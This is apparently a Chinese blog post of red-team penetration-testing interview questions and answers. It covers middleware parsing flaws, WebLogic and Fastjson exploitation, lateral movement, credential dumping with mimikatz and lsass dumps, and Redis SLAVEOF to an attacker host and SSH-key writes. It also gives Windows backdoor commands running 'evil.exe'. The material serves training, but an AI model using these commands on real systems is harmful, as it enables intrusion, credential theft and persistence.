2025年渗透测试面试题总结-渗透测试红队面试八(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

渗透测试红队面试八

二百一十一、常见中间件解析漏洞利用方式

二百一十二、MySQL用户密码存储与加密

二百一十三、Linux系统加固降权思路

二百一十四、绕过CDN获取真实IP

二百一十五、CMD查询远程开放端口

二百一十六、查找域控方法

二百一十七、CSRF成因及防御(非Token方案)

二百一十八、打点常用漏洞

二百一十九、Shiro漏洞发现方法

二百二十、WebLogic权限绕过

二百二十一、Fastjson漏洞原理

二百二十二、WebLogic漏洞类型

二百二十三、IIOP协议与类似技术

二百二十四、不出网漏洞利用方法

二百二十五、Webshell不出网应对措施

二百二十六、DNS出网协议利用

二百二十七、横向渗透命令执行手段

二百二十八、PsExec与WMIC区别

二百二十九、DCOM远程执行操作

二百三十、密码抓取方法

二百三十一、密码抓取版本限制

二百三十二、抓不到密码的应对

二百三十三、域内攻击方法

二百三十四、NTLM验证机制

二百三十五、Kerberos票据攻击

二百三十六、Windows Redis利用

二百三十七、Linux Redis利用

二百三十八、Windows后门方式

二百三十九、CS的哈希与密码获取

二百四十、收集RDP记录及对抗杀软

渗透测试红队面试八

二百一十一、说说常见的中间件解析漏洞利用方式二百一十二、mysql的用户名密码是存放在那张表里面?mysql密码采用哪种加密方式?二百一十三、Windows、Linux、数据库的加固降权思路,任选其一二百一十四、如何绕过CDN获取目标网站真实IP,谈谈你的思路?二百一十五、CMD命令行如何查询远程终端开放端口二百一十六、怎么查找域控二百一十七、CSRF 成因及防御措施;如果不用 token 如何做防御?二百一十八、打点一般会用什么漏洞二百一十九、平常怎么去发现shiro漏洞的二百二十、weblogic权限绕过有没有了解二百二十一、fastjson漏洞利用原理二百二十二、weblogic有几种漏洞二百二十三、IIOP听说过吗,和什么类似二百二十四、这几个漏洞不出网情况下怎么办二百二十五、拿到webshell不出网情况下怎么办二百二十六、dns出网协议怎么利用二百二十七、横向渗透命令执行手段二百二十八、psexec和wmic或者其他的区别二百二十九、Dcom怎么操作?二百三十、抓取密码的话会怎么抓二百三十一、什么版本之后抓不到密码二百三十二、抓不到的话怎么办二百三十三、域内攻击方法有了解过吗二百三十四、ntlm验证机制二百三十五、kerberos认证黄金、白银票据制作原理,以及需要哪个值二百三十六、window redis 需要有哪些利用手段,除了写文件和启动项二百三十七、linux redis 写有哪些利用方式二百三十八、windows后门包括哪些方式二百三十九、cs hashdump和logonpasswd 分别从哪里读取哈希和密码二百四十、如何收集rdp连接记录,如果有杀软怎么办

二百一十一、常见中间件解析漏洞利用方式

  1. IIS解析漏洞
    • 目录解析/test.asp;.jpg 被解析为ASP脚本(IIS6.0)。
    • 分号截断test.asp;.jpg 利用分号绕过扩展名检查。
    • PUT写文件:通过HTTP PUT方法上传脚本文件(需配置不当)。
  2. Apache解析漏洞
    • 多后缀解析test.php.xxx.xxx未定义,按最后一个有效后缀解析(如.php)。
    • .htaccess覆盖:上传自定义.htaccess设置解析规则(如AddType application/x-httpd-php .jpg)。
  3. Nginx解析漏洞
    • 路径解析错误/test.jpg/test.phptest.jpg 作为PHP执行(Nginx + PHP-FPM配置不当)。
    • CVE-2013-4547:利用未正确处理空格和\0字符绕过检查(如test.jpg \0.php )。

二百一十二、MySQL用户密码存储与加密

  1. 存储位置
    • 表名mysql.user 表存储用户名、主机权限及密码哈希。
    • 字段authentication_string(MySQL 5.7+)或password(旧版)。
  2. 加密方式
    • MySQL 4.1+:双重SHA1加密(SHA1(SHA1(password)))。
    • MySQL 8.0+:默认使用caching_sha2_password插件(SHA256哈希)。
  3. 补充信息
    • 查询用户权限:SELECT user, host, authentication_string FROM mysql.user;
    • 身份验证插件变更可能导致旧客户端兼容性问题(需启用mysql_native_password)。

二百一十三、Linux系统加固降权思路

  1. 最小权限原则
    • 用户权限:创建低权限用户运行服务(如www-data运行Web服务)。
    • SUID/SGID清理find / -perm /4000 -o -perm /2000查找并删除非必要特权文件。
  2. 服务与网络加固
    • 禁用无用服务systemctl disable vsftpd关闭FTP等非必要服务。
    • 防火墙规则iptables限制仅开放必要端口(如SSH仅允许特定IP)。
  3. 文件系统安全
    • 敏感文件权限chmod 600 /etc/shadow限制访问。
    • SELinux/AppArmor:启用强制访问控制,限制进程权限。

二百一十四、绕过CDN获取真实IP

  1. 历史记录查询
    • DNS历史:通过SecurityTrails、ViewDNS查询历史解析记录。
    • IP数据库:使用Censys或Shodan搜索目标域名早期绑定的IP。
  2. 子域名探测
    • 爆破子域subfinderamass发现未使用CDN的子域(如dev.example.com )。
    • 邮件服务器:分析邮件头中Received字段获取服务器IP。
  3. 主动探测技巧
    • SSRF漏洞:利用目标站点的SSRF读取内网元数据(如AWS的169.254.169.254)。
    • 全网段扫描:对目标域名解析的CDN IP段进行端口扫描,寻找非标准端口服务。

二百一十五、CMD查询远程开放端口

  1. 基础命令
    • Telnettelnet <IP> <端口>(若连接成功则端口开放)。
    • Netstatnetstat -ano | findstr "ESTABLISHED"查看本地连接。
  2. PowerShell工具
    • Test-NetConnectionTest-NetConnection <IP> -Port <端口>显示端口状态。
  3. 第三方工具
    • Nmapnmap -p 1-1000 <IP>扫描指定端口范围。
    • PortQry:微软工具,支持批量端口检测。

二百一十六、查找域控方法

  1. DNS查询
    • SRV记录nslookup -type=SRV _ldap._tcp.dc._msdcs.< 域名>定位域控的LDAP服务。
  2. 系统命令
    • nltestnltest /dclist:<域名>列出域控列表。
    • net命令net group "Domain Controllers" /domain查询域控组。
  3. LDAP查询
    • PowerShell
      powershellGet-ADDomainController -Discover -Service PrimaryDC | Select-Object Name, IPv4Address 
      

二百一十七、CSRF成因及防御(非Token方案)

  1. 漏洞成因
    • 浏览器自动携带Cookie:攻击者诱导用户访问恶意页面,触发跨站请求。
    • 无二次验证:敏感操作未校验请求来源。
  2. 防御措施(非Token)
    • SameSite Cookie:设置SameSite=Strict限制跨站请求。
    • Referer验证:检查HTTP头Referer是否来自合法域名。
    • CAPTCHA验证:关键操作前要求用户输入验证码。

二百一十八、打点常用漏洞

  1. Web漏洞
    • SQL注入:通过注入获取数据库权限(如后台管理员凭证)。
    • 文件上传:上传Webshell控制服务器(如绕过类型检查)。
  2. 服务漏洞
    • 未授权访问:Redis、MongoDB等直接执行命令。
    • RCE漏洞:如Log4j2、Fastjson反序列化。
  3. 配置缺陷
    • 默认密码:Tomcat、Jenkins等管理界面弱口令。
    • SSRF:利用内网探测或元数据服务攻击。

二百一十九、Shiro漏洞发现方法

  1. Cookie特征识别
    • RememberMe字段:Base64解码后开头为x01x02x03x04(序列化数据特征)。
  2. 漏洞扫描工具
    • ShiroExploit:自动化检测密钥及反序列化漏洞。
    • Burp插件ShiroScan检测Cookie有效性。
  3. 手工检测
    • 密钥爆破:利用已知密钥列表(如kPH+bIxk5D2deZiIxcaaaA==)测试反序列化。
    • DNSLog验证:构造恶意序列化数据触发DNS请求,确认漏洞存在。

二百二十、WebLogic权限绕过

  1. CVE-2020-14882
    • 未授权访问:访问/console/css/%252e%252e%252fconsole.portal 绕过控制台认证。
    • 利用工具weblogic-framework直接执行命令。
  2. CVE-2021-2109
    • 管理接口绕过:通过构造特殊URL路径访问后台功能。
  3. 修复建议
    • 更新补丁,限制管理接口访问IP,启用强认证机制。

二百二十一、Fastjson漏洞原理

  1. 反序列化机制
    • @type指定类:攻击者通过JSON中的@type指定恶意类触发Gadget链。
    • JNDI注入:利用com.sun.rowset.JdbcRowSetImpl 等类加载远程恶意代码。
  2. 漏洞版本
    • <=1.2.24:默认支持autoType,可直接利用。
    • 1.2.25-1.2.47:需绕过autoType检查(如利用L前缀或特殊类名)。
  3. 防御方案
    • 升级至1.2.83+版本,关闭autoType功能,使用白名单机制。

二百二十二、WebLogic漏洞类型

  1. 反序列化漏洞
    • T3协议:CVE-2018-2628利用T3反序列化执行命令。
    • XMLDecoder:CVE-2017-10271通过WLS组件触发。
  2. SSRF漏洞
    • CVE-2014-4210uddiexplorer组件未限制内网请求。
  3. 权限绕过
    • CVE-2020-14825:绕过Console组件权限校验。

二百二十三、IIOP协议与类似技术

  1. IIOP协议
    • 用途:CORBA的通信协议,用于分布式对象调用。
    • 类似技术:与RMI(Java远程方法调用)类似,均涉及序列化数据传输。
  2. 漏洞利用
    • 反序列化攻击:通过IIOP传输恶意对象触发Gadget链(如WebLogic CVE-2020-2551)。

二百二十四、不出网漏洞利用方法

  1. DNS/ICMP隧道
    • DNS协议:使用dnscat2通过DNS查询传输数据。
    • ICMP协议:利用ptunnelicmpsh建立隐蔽通道。
  2. 内网服务中继
    • SMB Relay:通过Responder工具捕获NTLM哈希并中继至其他主机。
  3. Web反向连接
    • HTTP文件传输:通过Web服务上传/下载文件(如Python http.server )。

二百二十五、Webshell不出网应对措施

  1. 内网探测
    • 扫描内网段:使用for /L %i in (1,1,255) do ping -n 1 192.168.1.%i发现存活主机。
  2. 利用现有服务
    • 数据库外联:通过MySQL SELECT ... INTO OUTFILE写入Web目录。
    • 邮件发送:使用SMTP协议将数据外传。
  3. 内存加载
    • PowerShell脚本:反射加载恶意代码,避免落地文件。

二百二十六、DNS出网协议利用

  1. DNS隧道
    • 工具dnscat2建立加密隧道,执行命令或传输文件。
    • 隐蔽性:利用TXT或CNAME记录传输数据,绕过防火墙检测。
  2. 数据渗透
    • 子域名携带数据data.example.com 解析为Base64编码的敏感信息。

二百二十七、横向渗透命令执行手段

  1. PsExec
    • 特点:需目标开启ADMIN$共享,生成服务执行命令,日志明显。
  2. WMI
    • 命令wmic /node:<IP> process call create "cmd.exe /c whoami"
    • 优势:无需安装客户端,基于135端口。
  3. SSH密钥利用
    • 条件:获取目标SSH私钥,通过ssh -i id_rsa user@ip直接登录。

二百二十八、PsExec与WMIC区别

PsExecWMIC
需目标开启ADMIN$共享和文件写入权限。仅需135端口和有效凭证,无需文件操作。
生成服务进程,日志记录明显(svchost)。通过WMI协议执行,日志较隐蔽。
适合批量操作,但易触发告警。更隐蔽,但命令长度受限。

二百二十九、DCOM远程执行操作

  1. 原理
    • DCOM接口:通过COM对象远程调用方法(如MMC20.Application)。
  2. 利用步骤
    • 列出DCOM对象Get-CimInstance Win32_DCOMApplication
    • 执行命令
      powershell$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<IP>")) $com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")

二百三十、密码抓取方法

  1. Mimikatz
    • 命令sekurlsa::logonpasswords提取内存中的明文密码和哈希。
  2. 注册表导出
    • SAM/SYSTEM文件reg save HKLM\SAM SAM.bak 导出后使用secretsdump解析。
  3. Procdump转储
    • 转储LSASSprocdump.exe -ma lsass.exe lsass.dmp ,本地用Mimikatz解析。

二百三十一、密码抓取版本限制

  1. Windows 8.1/Server 2012+
    • WDigest禁用:默认不缓存明文密码(需启用注册表项UseLogonCredential)。
  2. Windows 10/Server 2016+
    • LSASS保护:启用Credential Guard后无法直接读取内存密码。

二百三十二、抓不到密码的应对

  1. 哈希传递(Pass-the-Hash)
    • 工具psexec.pycrackmapexec使用NTLM哈希横向移动。
  2. Kerberos票据
    • 黄金票据:利用krbtgt哈希伪造TGT,访问任意服务。

二百三十三、域内攻击方法

  1. 横向移动
    • MS17-010:利用永恒之蓝漏洞攻击未修补主机。
  2. 权限提升
    • ACL滥用:修改域对象的ACL,授予自身特权(如DCsync权限)。
  3. 持久化
    • Skeleton Key:植入恶意域控后门,使用万能密码登录。

二百三十四、NTLM验证机制

  1. 三步握手
    • 协商:客户端发送NEGOTIATE_MESSAGE。
    • 挑战:服务器返回CHALLENGE_MESSAGE(包含随机Nonce)。
    • 认证:客户端使用密码哈希加密Nonce生成RESPONSE_MESSAGE。
  2. 中间人攻击
    • NTLM Relay:将认证请求中继至其他服务器,执行命令或获取权限。

二百三十五、Kerberos票据攻击

  1. 黄金票据
    • 原理:伪造TGT票据,需krbtgt的NTLM哈希和域SID。
    • 用途:访问域内任意服务。
  2. 白银票据
    • 原理:伪造特定服务的ST票据,需服务账户哈希和服务SPN。
    • 用途:仅限访问特定服务(如CIFS文件共享)。

二百三十六、Windows Redis利用

  1. 主从复制RCE
    • 步骤:设置恶意主节点,同步module.dll 执行命令。
    • 命令
      bashredis-cli -h <target> SLAVEOF <attacker-ip> 6379 
  2. 计划任务劫持
    • 写入任务:通过CONFIG SET dirdbfilename写入恶意任务文件。

二百三十七、Linux Redis利用

  1. SSH密钥写入
    • 命令
      basredis-cli -h <target> config set dir /root/.ssh redis-cli -h <target> config set dbfilename "authorized_keys" redis-cli -h <target> set x "\n\nssh-rsa AAAAB3Nz...\n\n" redis-cli -h <target> save 
  2. Crontab后门
    • 写入任务:设置定时任务反弹Shell。

二百三十八、Windows后门方式

  1. 注册表启动项
    • 路径HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  2. 计划任务
    • 命令schtasks /create /tn "Update" /tr "C:\evil.exe" /sc onstart
  3. 服务后门
    • 创建服务sc create EvilService binPath= "C:\evil.exe" start= auto

二百三十九、CS的哈希与密码获取

  1. hashdump
    • 来源:从LSASS进程内存中提取NTLM哈希。
  2. logonpasswords
    • 来源:从Windows凭据管理器获取明文密码(需WDigest启用)。

二百四十、收集RDP记录及对抗杀软

  1. 记录位置
    • 注册表HKCU\Software\Microsoft\Terminal Server Client\Servers
    • 日志文件%USERPROFILE%\Documents\Default.rdp
  2. 绕过杀软
    • 离线提取:直接复制注册表文件或日志到本地分析。
    • 隐蔽工具:使用PowerShell脚本读取注册表,避免触发行为检测。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/80785.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

大语言模型主流架构解析:从 Transformer 到 GPT、BERT

&#x1f4cc; 友情提示&#xff1a; 本文内容由银河易创AI&#xff08;https://ai.eaigx.com&#xff09;创作平台的gpt-4-turbo模型生成&#xff0c;旨在提供技术参考与灵感启发。文中观点或代码示例需结合实际情况验证&#xff0c;建议读者通过官方文档或实践进一步确认其准…

Java设计模式之装饰器模式:从基础到高级的全面解析(万字解析)

装饰器模式(Decorator Pattern)是一种结构型设计模式,它允许向一个现有的对象添加新的功能,同时又不改变其结构。这种模式创建了一个装饰类,用来包装原有的类,并在保持类方法签名完整性的前提下,提供了额外的功能。 一、装饰器模式基础概念 1.1 什么是装饰器模式 装饰…

RN 鸿蒙混合开发实践(踩坑)

#三方框架# #React Native # 1 。环境配置&#xff1b; 安装 DevEco 开发工具&#xff1b; Node 版本16&#xff1b; hdc环境配置 hdc 是 OpenHarmony 为开发人员提供的用于调试的命令行工具&#xff0c;鸿蒙 React Native 工程使用 hdc 进行真机调试。hdc 工具通过 OpenHa…

动态网站 LNMP

一、名词解释&#xff1a; LNMP&#xff1a; L : 代表 Linux 操作系统&#xff0c;为网站提供了可靠的运行环境N : 代表 Nginx&#xff0c;它是一款轻量级的高性能 Web 服务器&#xff0c;能够快速处理大量并 发连接&#xff0c;有效提升网站的访问速度和性能 M : 代表…

DAY04:Vue.js 指令与事件处理深度解析之从基础到实战

1. 指令系统核心概念 1.1 插值表达式与基础指令 Vue.js 的指令系统是其响应式编程模型的核心&#xff0c;我们首先从最基础的插值表达式开始&#xff1a; <div id"app"><!-- 基础文本插值 --><p>{{ message }}</p><!-- JavaScript 表达…

12配置Hadoop集群-集群配置

&#xff08;一&#xff09;Hadoop的组成 对普通用户来说&#xff0c; Hadoop就是一个东西&#xff0c;一个整体&#xff0c;它能给我们提供无限的磁盘用来保存文件&#xff0c;可以使用提供强大的计算能力。 在Hadoop3.X中&#xff0c;hadoop一共有三个组成部…

Kubernetes生产实战(四):kubelet日志快速定位指南

kubelet作为Kubernetes节点的核心管家&#xff0c;其日志是排查节点问题的金钥匙。本文将分享生产环境中查看和分析kubelet日志的完整方案&#xff0c;助你快速定位节点级故障。 一、基础操作&#xff1a;快速查看日志 1. systemd服务日志&#xff08;推荐首选&#xff09; …

麦科信获评CIAS2025金翎奖【半导体制造与封测领域优质供应商】

在苏州举办的2025CIAS动力能源与半导体创新发展大会上&#xff0c;深圳麦科信科技有限公司凭借在测试测量领域的技术积累&#xff0c;入选半导体制造与封测领域优质供应商榜单。本届大会以"新能源芯时代"为主题&#xff0c;汇集了来自功率半导体、第三代材料应用等领…

Python实例题:pygame开发打飞机游戏

目录 Python实例题 题目 pygame-aircraft-game使用 Pygame 开发的打飞机游戏脚本 代码解释 初始化部分&#xff1a; 游戏主循环&#xff1a; 退出部分&#xff1a; 运行思路 注意事项 Python实例题 题目 pygame开发打飞机游戏 pygame-aircraft-game使用 Pygame 开发…

Gin 框架入门

Gin 框架入门 一、响应数据 JSON 响应 在 Web 开发中&#xff0c;JSON 是一种常用的数据交换格式。Gin 提供了简便的方法来响应 JSON 数据。 package mainimport ("github.com/gin-gonic/gin" )func main() {r : gin.Default()r.GET("/json", func(c *…

Flink实时数仓数据突变时,如何快速排查原因

在大数据时代,数据的价值已经被无数企业和组织深刻认识到,而实时数仓作为数据处理和分析的重要基础设施,正在逐渐成为推动业务增长和决策优化的核心引擎。想象一下,电商平台在双十一大促期间需要实时监控订单量、用户行为,甚至库存变化,以便及时调整营销策略和物流调度;…

视频人像抠图技术选型--截止2025年4月

前言&#xff1a;我是一名算法工程师&#xff0c;经常需要对某个AI功能做技术调研和输出技术选型报告&#xff0c;在过去多年的工作当中&#xff0c;积累了很多内容&#xff0c;我会陆陆续续将这些内容整理出来分享给大家&#xff0c;希望大家喜欢&#xff0c;感谢您的阅读&…

docker compose ps 命令

docker compose ps 命令用于列出与 Docker Compose 项目相关的容器及其状态。 docker compose ps 能显示当前项目中所有服务容器的运行状态、端口映射等信息。 语法 docker compose ps [OPTIONS] [SERVICE…] SERVICE&#xff08;可选&#xff09;&#xff1a;指定要查看状态…

C语言 字符函数和字符串函数(1)

目录 1.字符分类函数 2.字符转换函数 3.strlen的使用和模拟实现 4.strcpy的使用和模拟实现 在编程的过程中&#xff0c;我们经常要处理字符和字符串&#xff0c;为了方便操作字符和字符串&#xff0c;C语言标准库中提 供了一系列库函数&#xff0c;接下来我们就学习一下这…

MySQL 中如何进行 SQL 调优?

在MySQL中进行SQL调优是一个系统性工程&#xff0c;需结合索引优化、查询改写、性能分析工具、数据库设计及硬件配置等多方面策略。以下是具体优化方法及案例说明&#xff1a; 一、索引优化&#xff1a;精准提速的关键 索引类型选择 普通索引&#xff1a;加速频繁查询的列&…

OpenCV图像金字塔详解:原理、实现与应用

一、什么是图像金字塔&#xff1f; 图像金字塔是图像处理中一种重要的多尺度表示方法&#xff0c;它通过对图像进行重复的平滑和降采样&#xff08;或上采样&#xff09;操作&#xff0c;生成一系列分辨率逐渐降低&#xff08;或升高&#xff09;的图像集合。这种结构形似金字…

收集飞花令碎片——C语言分支与循环语句(上)

前言 Hello,各位码友&#xff0c;本章将会给大家带来C语言的分支与循环整章串讲&#xff0c;这一张的内容分为基础知识和程序练习两个部分 希望通过这一章能够带大家更好地去掌握C语言的分支与循环语句 大家一起努力吧 C语言分支与循环语句&#xff08;基础知识&#xff09; C…

嵌入式硬件篇---TOF|PID

文章目录 前言1. 硬件准备主控芯片ToF模块1.VL53L0X2.TFmini 执行机构&#xff1a;电机舵机其他 2. 硬件连接(1) VL53L0X&#xff08;IC接口&#xff09;(2) TFmini&#xff08;串口通信&#xff09; 3. ToF模块初始化与数据读取(1) VL53L0X&#xff08;基于HAL库&#xff09;(…

PCB设计实践(十二)PCB设计电容选型:功能、材质、规则

在PCB设计中&#xff0c;电容作为基础元件承担着滤波、储能、去耦、耦合等核心功能。其分类与使用规则直接影响电路稳定性、抗干扰能力和信号完整性。本文从工程实践角度系统梳理PCB设计中电容的五大分类、选型规范及布局布线规则&#xff0c;帮助设计者构建科学的电容应用体系…

vue2关闭eslint

在项目根目录下找到 vue.config.js 文件。如果没有该文件&#xff0c;可以直接在项目根目录创建一个。 2. 添加 lintOnSave: false 配置 module.exports {lintOnSave: false };